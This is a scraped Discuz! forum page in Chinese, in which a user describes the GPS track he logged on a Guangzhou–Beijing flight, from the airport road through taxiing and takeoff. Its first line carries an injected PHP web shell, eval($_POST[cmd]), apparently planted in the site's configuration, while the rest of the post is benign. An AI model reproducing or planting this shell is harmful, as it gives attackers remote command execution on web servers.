');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 網友真實記錄航班飛行GPS軌跡 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

網友真實記錄航班飛行GPS軌跡

  五一的時候飛了趟廣州-北京,航班號忘記了,GPS數據導出來的時候不知道為什麼沒有了高度,鬱悶的只能有平面圖了。

  由於飛機上只有貼著窗戶才能收到GPS信號,所以為了低調同時吃飯和睡覺,起飛到了7800米後我就關機,等起床以後都快降落才打開,所以中間一段是直線,沒有數據的



整個飛行軌跡


在機場高速的時候打開了GPS,記錄了一段



  24-27點是坐車到機場前的一段記錄,從這段記錄可以看出是坐什麼車到機場的。



  上了擺渡車,又收到信號了,熟悉PEK的人就知道是在哪個登機口上的飛機

  前機是從莫斯科回來的777,好像是B2068吧,這次來回都是777,都是莫斯科回來後接飛的航班,太巧了!



  很抱歉,中間一段在到處尋找GPS信號,又不想做得太猖狂,所以沒記錄了。

  直到跑道口,才發現原來只有窗口才能收到衛星的信號。


很顯然,飛機在兩個地方等待起飛,終於上跑道了。


起飛,在加速



  起飛以後,航向330,當時我記得GPS上顯示的航向是非常精確,就是330。


整個起飛的全程

  

編輯點評:在航班上使用GPS等電子儀器前最好先咨詢一下航空公司或者空乘人員,避免引起誤會或影響飛行安全。
返回列表